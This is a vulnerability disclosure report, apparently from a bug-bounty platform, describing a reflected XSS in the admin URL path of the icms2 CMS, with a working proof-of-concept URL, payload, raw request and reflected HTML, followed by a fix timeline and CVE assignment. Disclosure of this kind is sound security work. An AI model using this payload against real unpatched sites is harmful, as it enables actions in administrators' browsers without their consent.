Reflected XSS in URL path of '/admin/controllers/edit/activity/perms/' in instantsoft/icms2
Valid
Reported on
Aug 4th 2023
Description
/admin/controllers/edit/activity/perms/ takes input from the URL directly without sufficient sanitization leading to a Reflected XSS.
A valid admin session is required, without it, the user will be brought to the login page instead of the affected page.
Proof of Concept
- Login as an administrator
- Visit the following URL to trigger JavaScript code:
http://icms.local/admin/controllers/edit/activity/perms/%22%3E%3Cimg%20src%3da%20onerror%3dalert(location.origin)%3E
Payload
"><img src=a onerror=alert(location.origin)>
Request:
GET /admin/controllers/edit/activity/perms/%22%3E%3Cimg%20src%3da%20onerror%3dalert(location.origin)%3E HTTP/1.1
Host: icms.local
[...]
The inserted input would then be reflected on the page like this:
<form action="/admin/controllers/edit/activity/perms_save/"><img src=a onerror=alert(location.origin)>" method="post">
Remedial Action
It is recommended to sanitize the input before it is reflected on the affected page.
Impact
An attacker could perform unauthorized actions in the context of the victim's browser.
We are processing your report and will contact the
instantsoft/icms2
team within 24 hours.
2 months ago
We have contacted a member of the
instantsoft/icms2
team and are waiting to hear back
2 months ago
Fixed https://github.com/instantsoft/icms2/commit/1dbc3e6c8fbf5d2dc551cb27fad0de3584dee40f
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Thank you!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
to join this conversation